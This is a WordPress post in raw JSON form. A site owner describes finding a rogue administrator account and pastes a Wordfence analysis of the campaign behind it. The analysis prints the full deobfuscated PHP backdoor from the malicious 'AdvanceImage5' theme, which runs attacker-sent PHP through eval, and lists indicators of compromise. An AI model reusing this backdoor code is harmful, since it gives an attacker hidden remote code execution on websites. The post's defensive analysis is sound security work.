{"id":4384,"date":"2026-07-19T13:29:17","date_gmt":"2026-07-19T13:29:17","guid":{"rendered":"https:\/\/ifx0.com\/?p=4384"},"modified":"2026-07-19T13:58:23","modified_gmt":"2026-07-19T13:58:23","slug":"solar-salvador-wordpress-plugin-aimed-to-hack-our-website","status":"publish","type":"post","link":"https:\/\/ifx0.com\/index.php\/2026\/07\/19\/solar-salvador-wordpress-plugin-aimed-to-hack-our-website\/","title":{"rendered":"solar salvador wordpress plugin aimed to hack our website"},"content":{"rendered":"\n<p>we have detected that the website shared various abnormal casino posts and we have removed it.<\/p>\n<p>after checking username list, we found\u00a0<\/p>\n<table class=\"wp-list-table widefat fixed striped users\">\n<tbody id=\"the-list\" data-wp-lists=\"list:user\">\n<tr id=\"user-1402\">\n<td class=\"name column-name\" data-colname=\"Name\">\u00a0<\/td>\n<td class=\"email column-email\" data-colname=\"Email\"><a href=\"mailto:solarsalvador1234@gmail.com\">solarsalvador1234@gmail.com<\/a><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>as administrador.<\/p>\n<p>&#8221;<\/p>\n<p>The email address\u00a0<code>solarsalvador1234@gmail.com<\/code> has been previously associated with <a href=\"https:\/\/www.wordfence.com\/blog\/2019\/05\/critical-vulnerability-patched-in-popular-convert-plus-plugin\/\" target=\"_blank\" rel=\"noopener noreferrer\">attacks against the Convert Plus plugin<\/a>, where a similar vulnerability allowed attackers to register a privileged user. Google searches for this address reveal a number of compromised WordPress sites showing an associated user profile.<\/p>\n<p>In addition to the Profile Builder and ThemeGrill Demo Importer vulnerabilities, the IP address associated with \u201csolarsalvador1234\u201d is also exploiting Duplicator\u2019s recent file download flaw. By downloading <code>wp-config.php<\/code> files from vulnerable sites, they can use the stored credentials to access remote MySQL databases and compromise the site from there. In all three vulnerabilities, the end goal is the same: Administrative access to the victim\u2019s WordPress site.<\/p>\n<p>In the attacks we\u2019re currently tracking, we\u2019ve identified \u201csolarsalvador1234\u201d attempting to upload backdoors through the same method as \u201ctonyredball\u201d: the WordPress theme uploader. However, instead of uploading a single file as in our previous example, they upload a malicious archive named <code>AdvanceImage5.zip<\/code>. This ZIP archive technically contains a valid WordPress theme, having copied the <code>index.php<\/code> and\u00a0<code>style.css<\/code> scripts from the Twenty Fifteen theme, required for WordPress to correctly store the extracted files. Other than those required files, the archive is purely malicious and contains backdoors intended to help the attacker maintain access long-term. The malicious theme\u00a0<code>AdvanceImage5<\/code> has previously been associated with other attack campaigns, including those targeting <a href=\"https:\/\/www.wordfence.com\/blog\/2019\/02\/vulnerabilities-patched-in-wp-cost-estimation-plugin\/\">last year\u2019s vulnerability in the WP Cost Estimation plugin<\/a>.<\/p>\n<p>\u00a0<\/p>\n<div>\n<div id=\"highlighter_792455\" class=\"syntaxhighlighter  php\">\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td class=\"gutter\">\n<div class=\"line number1 index0 alt2\">1<\/div>\n<div class=\"line number2 index1 alt1\">2<\/div>\n<div class=\"line number3 index2 alt2\">3<\/div>\n<div class=\"line number4 index3 alt1\">4<\/div>\n<div class=\"line number5 index4 alt2\">5<\/div>\n<div class=\"line number6 index5 alt1\">6<\/div>\n<div class=\"line number7 index6 alt2\">7<\/div>\n<div class=\"line number8 index7 alt1\">8<\/div>\n<div class=\"line number9 index8 alt2\">9<\/div>\n<div class=\"line number10 index9 alt1\">10<\/div>\n<div class=\"line number11 index10 alt2\">11<\/div>\n<div class=\"line number12 index11 alt1\">12<\/div>\n<div class=\"line number13 index12 alt2\">13<\/div>\n<div class=\"line number14 index13 alt1\">14<\/div>\n<div class=\"line number15 index14 alt2\">15<\/div>\n<div class=\"line number16 index15 alt1\">16<\/div>\n<div class=\"line number17 index16 alt2\">17<\/div>\n<div class=\"line number18 index17 alt1\">18<\/div>\n<div class=\"line number19 index18 alt2\">19<\/div>\n<div class=\"line number20 index19 alt1\">20<\/div>\n<div class=\"line number21 index20 alt2\">21<\/div>\n<div class=\"line number22 index21 alt1\">22<\/div>\n<div class=\"line number23 index22 alt2\">23<\/div>\n<div class=\"line number24 index23 alt1\">24<\/div>\n<div class=\"line number25 index24 alt2\">25<\/div>\n<div class=\"line number26 index25 alt1\">26<\/div>\n<div class=\"line number27 index26 alt2\">27<\/div>\n<div class=\"line number28 index27 alt1\">28<\/div>\n<div class=\"line number29 index28 alt2\">29<\/div>\n<div class=\"line number30 index29 alt1\">30<\/div>\n<div class=\"line number31 index30 alt2\">31<\/div>\n<div class=\"line number32 index31 alt1\">32<\/div>\n<div class=\"line number33 index32 alt2\">33<\/div>\n<div class=\"line number34 index33 alt1\">34<\/div>\n<div class=\"line number35 index34 alt2\">35<\/div>\n<div class=\"line number36 index35 alt1\">36<\/div>\n<div class=\"line number37 index36 alt2\">37<\/div>\n<div class=\"line number38 index37 alt1\">38<\/div>\n<\/td>\n<td class=\"code\">\n<div class=\"container\">\n<div class=\"line number1 index0 alt2\"><code class=\"php plain\">&lt;?php<\/code><\/div>\n<div class=\"line number2 index1 alt1\"><code class=\"php plain\">@<\/code><code class=\"php functions\">ini_set<\/code><code class=\"php plain\">(<\/code><code class=\"php string\">\"error_log\"<\/code><code class=\"php plain\">, NULL);<\/code><\/div>\n<div class=\"line number3 index2 alt2\"><code class=\"php plain\">@<\/code><code class=\"php functions\">ini_set<\/code><code class=\"php plain\">(<\/code><code class=\"php string\">\"log_errors\"<\/code><code class=\"php plain\">, 0);<\/code><\/div>\n<div class=\"line number4 index3 alt1\"><code class=\"php plain\">@<\/code><code class=\"php functions\">ini_set<\/code><code class=\"php plain\">(<\/code><code class=\"php string\">\"max_execution_time\"<\/code><code class=\"php plain\">, 0);<\/code><\/div>\n<div class=\"line number5 index4 alt2\"><code class=\"php plain\">@set_time_limit(0);<\/code><\/div>\n<div class=\"line number6 index5 alt1\"><code class=\"php variable\">$data<\/code> <code class=\"php plain\">= NULL;<\/code><\/div>\n<div class=\"line number7 index6 alt2\"><code class=\"php variable\">$data_key<\/code> <code class=\"php plain\">= NULL;<\/code><\/div>\n<div class=\"line number8 index7 alt1\"><code class=\"php variable\">$GLOBALS<\/code><code class=\"php plain\">[<\/code><code class=\"php string\">\"auth\"<\/code><code class=\"php plain\">] = <\/code><code class=\"php string\">\"4ef63abe-1abd-45a6-913d-6fb99657e24b\"<\/code><code class=\"php plain\">;<\/code><\/div>\n<div class=\"line number9 index8 alt2\"><code class=\"php keyword\">global<\/code> <code class=\"php variable\">$auth<\/code><code class=\"php plain\">;<\/code><\/div>\n<div class=\"line number10 index9 alt1\">\u00a0<\/div>\n<div class=\"line number11 index10 alt2\"><code class=\"php keyword\">function<\/code> <code class=\"php plain\">sh_decrypt_phase(<\/code><code class=\"php variable\">$data<\/code><code class=\"php plain\">, <\/code><code class=\"php variable\">$key<\/code><code class=\"php plain\">) {<\/code><\/div>\n<div class=\"line number12 index11 alt1\"><code class=\"php spaces\">\u00a0\u00a0\u00a0\u00a0<\/code><code class=\"php variable\">$out_data<\/code> <code class=\"php plain\">= <\/code><code class=\"php string\">\"\"<\/code><code class=\"php plain\">;<\/code><\/div>\n<div class=\"line number13 index12 alt2\"><code class=\"php spaces\">\u00a0\u00a0\u00a0\u00a0<\/code><code class=\"php keyword\">for<\/code> <code class=\"php plain\">(<\/code><code class=\"php variable\">$i<\/code> <code class=\"php plain\">= 0; <\/code><code class=\"php variable\">$i<\/code> <code class=\"php plain\">&lt; <\/code><code class=\"php functions\">strlen<\/code><code class=\"php plain\">(<\/code><code class=\"php variable\">$data<\/code><code class=\"php plain\">) {<\/code><\/div>\n<div class=\"line number14 index13 alt1\"><code class=\"php spaces\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code><code class=\"php variable\">$jplufmtpaem<\/code> <code class=\"php plain\">= <\/code><code class=\"php string\">\"i\"<\/code><code class=\"php plain\">;<\/code><\/div>\n<div class=\"line number15 index14 alt2\"><code class=\"php spaces\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code><code class=\"php keyword\">for<\/code> <code class=\"php plain\">(<\/code><code class=\"php variable\">$j<\/code> <code class=\"php plain\">= 0;<\/code><code class=\"php variable\">$j<\/code> <code class=\"php plain\">&lt; <\/code><code class=\"php functions\">strlen<\/code><code class=\"php plain\">(<\/code><code class=\"php variable\">$key<\/code><code class=\"php plain\">) &amp;&amp; <\/code><code class=\"php variable\">$i<\/code> <code class=\"php plain\">&lt; <\/code><code class=\"php functions\">strlen<\/code><code class=\"php plain\">(<\/code><code class=\"php variable\">$data<\/code><code class=\"php plain\">); <\/code><code class=\"php variable\">$j<\/code><code class=\"php plain\">++, <\/code><code class=\"php variable\">$i<\/code><code class=\"php plain\">++) { <\/code><code class=\"php variable\">$out_data<\/code> <code class=\"php plain\">.= <\/code><code class=\"php functions\">chr<\/code><code class=\"php plain\">(ord(<\/code><code class=\"php variable\">$data<\/code><code class=\"php plain\">[<\/code><code class=\"php variable\">$i<\/code><code class=\"php plain\">]) ^ ord(<\/code><code class=\"php variable\">$key<\/code><code class=\"php plain\">[<\/code><code class=\"php variable\">$j<\/code><code class=\"php plain\">])); } } <\/code><code class=\"php keyword\">return<\/code> <code class=\"php variable\">$out_data<\/code><code class=\"php plain\">; } <\/code><code class=\"php keyword\">function<\/code> <code class=\"php plain\">sh_decrypt(<\/code><code class=\"php variable\">$data<\/code><code class=\"php plain\">, <\/code><code class=\"php variable\">$key<\/code><code class=\"php plain\">) { <\/code><code class=\"php keyword\">global<\/code> <code class=\"php variable\">$auth<\/code><code class=\"php plain\">; <\/code><code class=\"php keyword\">return<\/code> <code class=\"php plain\">sh_decrypt_phase(sh_decrypt_phase(<\/code><code class=\"php variable\">$data<\/code><code class=\"php plain\">, <\/code><code class=\"php variable\">$auth<\/code><code class=\"php plain\">), <\/code><code class=\"php variable\">$key<\/code><code class=\"php plain\">); } <\/code><code class=\"php keyword\">foreach<\/code><code class=\"php plain\">(<\/code><code class=\"php variable\">$_COOKIE<\/code> <code class=\"php keyword\">as<\/code> <code class=\"php variable\">$key<\/code> <code class=\"php plain\">=&gt; <\/code><code class=\"php variable\">$value<\/code><code class=\"php plain\">) {<\/code><\/div>\n<div class=\"line number16 index15 alt1\"><code class=\"php spaces\">\u00a0\u00a0\u00a0\u00a0<\/code><code class=\"php variable\">$data<\/code> <code class=\"php plain\">= <\/code><code class=\"php variable\">$value<\/code><code class=\"php plain\">;<\/code><\/div>\n<div class=\"line number17 index16 alt2\"><code class=\"php spaces\">\u00a0\u00a0\u00a0\u00a0<\/code><code class=\"php variable\">$data_key<\/code> <code class=\"php plain\">= <\/code><code class=\"php variable\">$key<\/code><code class=\"php plain\">;<\/code><\/div>\n<div class=\"line number18 index17 alt1\"><code class=\"php plain\">}<\/code><\/div>\n<div class=\"line number19 index18 alt2\">\u00a0<\/div>\n<div class=\"line number20 index19 alt1\"><code class=\"php keyword\">if<\/code><code class=\"php plain\">(!<\/code><code class=\"php variable\">$data<\/code><code class=\"php plain\">) {<\/code><\/div>\n<div class=\"line number21 index20 alt2\"><code class=\"php spaces\">\u00a0\u00a0\u00a0\u00a0<\/code><code class=\"php keyword\">foreach<\/code><code class=\"php plain\">(<\/code><code class=\"php variable\">$_POST<\/code> <code class=\"php keyword\">as<\/code> <code class=\"php variable\">$key<\/code> <code class=\"php plain\">=&gt; <\/code><code class=\"php variable\">$value<\/code><code class=\"php plain\">) {<\/code><\/div>\n<div class=\"line number22 index21 alt1\"><code class=\"php spaces\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code><code class=\"php variable\">$data<\/code> <code class=\"php plain\">= <\/code><code class=\"php variable\">$value<\/code><code class=\"php plain\">;<\/code><\/div>\n<div class=\"line number23 index22 alt2\"><code class=\"php spaces\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code><code class=\"php variable\">$data_key<\/code> <code class=\"php plain\">= <\/code><code class=\"php variable\">$key<\/code><code class=\"php plain\">;<\/code><\/div>\n<div class=\"line number24 index23 alt1\"><code class=\"php spaces\">\u00a0\u00a0\u00a0\u00a0<\/code><code class=\"php plain\">}<\/code><\/div>\n<div class=\"line number25 index24 alt2\"><code class=\"php plain\">}<\/code><\/div>\n<div class=\"line number26 index25 alt1\"><code class=\"php variable\">$data<\/code> <code class=\"php plain\">= @unserialize(sh_decrypt(@<\/code><code class=\"php functions\">base64_decode<\/code><code class=\"php plain\">( <\/code><code class=\"php variable\">$data<\/code> <code class=\"php plain\">) ,\u00a0 <\/code><code class=\"php variable\">$data_key<\/code> <code class=\"php plain\">));<\/code><\/div>\n<div class=\"line number27 index26 alt2\">\u00a0<\/div>\n<div class=\"line number28 index27 alt1\"><code class=\"php keyword\">if<\/code> <code class=\"php plain\">(isset(<\/code><code class=\"php variable\">$data<\/code><code class=\"php plain\">[<\/code><code class=\"php string\">\"ak\"<\/code><code class=\"php plain\">]) &amp;&amp; <\/code><code class=\"php variable\">$auth<\/code> <code class=\"php plain\">== <\/code><code class=\"php variable\">$data<\/code><code class=\"php plain\">[<\/code><code class=\"php string\">\"ak\"<\/code><code class=\"php plain\">]) {<\/code><\/div>\n<div class=\"line number29 index28 alt2\"><code class=\"php spaces\">\u00a0\u00a0\u00a0\u00a0<\/code><code class=\"php keyword\">if<\/code> <code class=\"php plain\">(<\/code><code class=\"php variable\">$data<\/code><code class=\"php plain\">[<\/code><code class=\"php string\">\"a\"<\/code><code class=\"php plain\">] == <\/code><code class=\"php string\">\"i\"<\/code><code class=\"php plain\">) {<\/code><\/div>\n<div class=\"line number30 index29 alt1\"><code class=\"php spaces\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code><code class=\"php variable\">$i<\/code> <code class=\"php plain\">= Array(<\/code><code class=\"php string\">\"pv\"<\/code> <code class=\"php plain\">=&gt; @phpversion() , <\/code><code class=\"php string\">\"sv\"<\/code> <code class=\"php plain\">=&gt; <\/code><code class=\"php string\">\"1.0-1\"<\/code> <code class=\"php plain\">, );<\/code><\/div>\n<div class=\"line number31 index30 alt2\"><code class=\"php spaces\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code><code class=\"php functions\">echo<\/code> <code class=\"php plain\">@serialize(<\/code><code class=\"php variable\">$i<\/code><code class=\"php plain\">);<\/code><\/div>\n<div class=\"line number32 index31 alt1\"><code class=\"php spaces\">\u00a0\u00a0\u00a0\u00a0<\/code><code class=\"php plain\">}<\/code><\/div>\n<div class=\"line number33 index32 alt2\"><code class=\"php spaces\">\u00a0\u00a0\u00a0\u00a0<\/code><code class=\"php keyword\">elseif<\/code> <code class=\"php plain\">(<\/code><code class=\"php variable\">$data<\/code><code class=\"php plain\">[<\/code><code class=\"php string\">\"a\"<\/code><code class=\"php plain\">] == <\/code><code class=\"php string\">\"e\"<\/code><code class=\"php plain\">) {<\/code><\/div>\n<div class=\"line number34 index33 alt1\"><code class=\"php spaces\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code><code class=\"php functions\">eval<\/code><code class=\"php plain\">(<\/code><code class=\"php variable\">$data<\/code><code class=\"php plain\">[<\/code><code class=\"php string\">\"d\"<\/code><code class=\"php plain\">]);<\/code><\/div>\n<div class=\"line number35 index34 alt2\"><code class=\"php spaces\">\u00a0\u00a0\u00a0\u00a0<\/code><code class=\"php plain\">}<\/code><\/div>\n<div class=\"line number36 index35 alt1\"><code class=\"php plain\">}<\/code><\/div>\n<div class=\"line number37 index36 alt2\">\u00a0<\/div>\n<div class=\"line number38 index37 alt1\"><code class=\"php plain\">?&gt;<\/code><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p>The code snippet above shows the deobfuscated contents of the campaign\u2019s primary backdoor, located in <code>AdvanceImage5\/header.php<\/code> . This script features protections much like our earlier example, intended to prevent other attackers from abusing the script. Taking things a step further, an <a href=\"https:\/\/en.wikipedia.org\/wiki\/XOR_cipher\" target=\"_blank\" rel=\"noopener noreferrer\">XOR cipher<\/a> is used to encrypt requests sent to the backdoor, presumably in an attempt to bypass detection by firewalls and security teams. Ultimately though, the behavior is the same for \u201csolarsalvador1234\u201d as it is for the backdoor used by \u201ctonyredball\u201d, an attacker can execute PHP scripts at will on the infected site.<\/p>\n<p>The activity associated with \u201csolarsalvador1234\u201d is linked to the IP address <code>77.71.115.52<\/code>. We mentioned this address in our <a href=\"https:\/\/www.wordfence.com\/blog\/2020\/02\/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites\/\">earlier post about attacks against a recent Duplicator vulnerability<\/a>, noting that a number of otherwise-legitimate websites are hosted on the server. It\u2019s not uncommon for attacks to come from compromised webservers, as they offer attackers a layer of abstraction to hide their physical location from victims.<\/p>\n<h3>Indicators of Compromise (IOCs)<\/h3>\n<ul>\n<li>Usernames\n<ul>\n<li>Randomly generated, starting with\u00a0<code>com<\/code> or <code>com_<\/code><\/li>\n<\/ul>\n<\/li>\n<li>Email addresses\n<ul>\n<li><code>solarsalvador1234@gmail.com<\/code><\/li>\n<li>Other randomly generated addresses, starting with\u00a0<code>com<\/code> or\u00a0<code>com_<\/code> and ending with\u00a0<code>@mail.com<\/code><\/li>\n<\/ul>\n<\/li>\n<li>IP Address\n<ul>\n<li><code>77.71.115.52<\/code><\/li>\n<\/ul>\n<\/li>\n<li>Malware Hashes (SHA-1)\n<ul>\n<li><code>47cb1646eba89f42319aa757423464476eb2fa7d<\/code><\/li>\n<li><code>3015d8f30b23eb6ebec608e992ff25ceccc6408d<\/code><\/li>\n<li><code>f8ae2f3fcc05f04aece9ca0e0e21c64f25c4f0d6<\/code><\/li>\n<li><code>93632169238cbb52daee5271c90c533f7614e7b1<\/code><\/li>\n<\/ul>\n<\/li>\n<li>Malicious Filepaths\n<ul>\n<li><code>wp-content\/themes\/AdvanceImage5\/config.php<\/code><\/li>\n<li><code>wp-content\/themes\/AdvanceImage5\/functions.php<\/code><\/li>\n<li><code>wp-content\/themes\/AdvanceImage5\/header.php<\/code><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<h2>Conclusion<\/h2>\n<p>The campaigns we\u2019ve detailed in this post are just two examples of attacks targeting recently patched vulnerabilities. As the owner of a site, it\u2019s your responsibility to remain aware of the changes made to the plugins and themes you use. When a security update is released, make it an immediate priority to install it. The threat actors facing the WordPress ecosystem quickly identify and exploit vulnerabilities, which compounds the importance of timely action to protect your infrastructure.<\/p>\n<p>All of the malicious code discussed in this post is detected by the Wordfence malware scanner. This is true for Premium users as well as the sites still using the free version. If you\u2019re unable to use Wordfence and are concerned about these campaigns, please make use of the indicators of compromise (IOCs) we\u2019ve shared to assist in your analysis.<\/p>\n<p>\u00a0<\/p>\n<p>reference:<a href=\"https:\/\/www.wordfence.com\/blog\/2020\/02\/multiple-attack-campaigns-targeting-recent-plugin-vulnerabilities\/\">https:\/\/www.wordfence.com\/blog\/2020\/02\/multiple-attack-campaigns-targeting-recent-plugin-vulnerabilities\/<\/a><\/p>\n<p>\u00a0<\/p>\n","protected":false},"excerpt":{"rendered":"<p>we have detected that the website shared various abnormal casino posts and we have removed it. after checking username list, we found\u00a0 \u00a0 solarsalvador1234@gmail.com as administrador. &#8221; The email address\u00a0solarsalvador1234@gmail.com has been previously associated with attacks against the Convert Plus <a href=\"https:\/\/ifx0.com\/index.php\/2026\/07\/19\/solar-salvador-wordpress-plugin-aimed-to-hack-our-website\/\" class=\"read-more\">Read More &#8230;<\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-4384","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/ifx0.com\/index.php\/wp-json\/wp\/v2\/posts\/4384","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ifx0.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ifx0.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ifx0.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/ifx0.com\/index.php\/wp-json\/wp\/v2\/comments?post=4384"}],"version-history":[{"count":1,"href":"https:\/\/ifx0.com\/index.php\/wp-json\/wp\/v2\/posts\/4384\/revisions"}],"predecessor-version":[{"id":4385,"href":"https:\/\/ifx0.com\/index.php\/wp-json\/wp\/v2\/posts\/4384\/revisions\/4385"}],"wp:attachment":[{"href":"https:\/\/ifx0.com\/index.php\/wp-json\/wp\/v2\/media?parent=4384"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ifx0.com\/index.php\/wp-json\/wp\/v2\/categories?post=4384"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ifx0.com\/index.php\/wp-json\/wp\/v2\/tags?post=4384"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}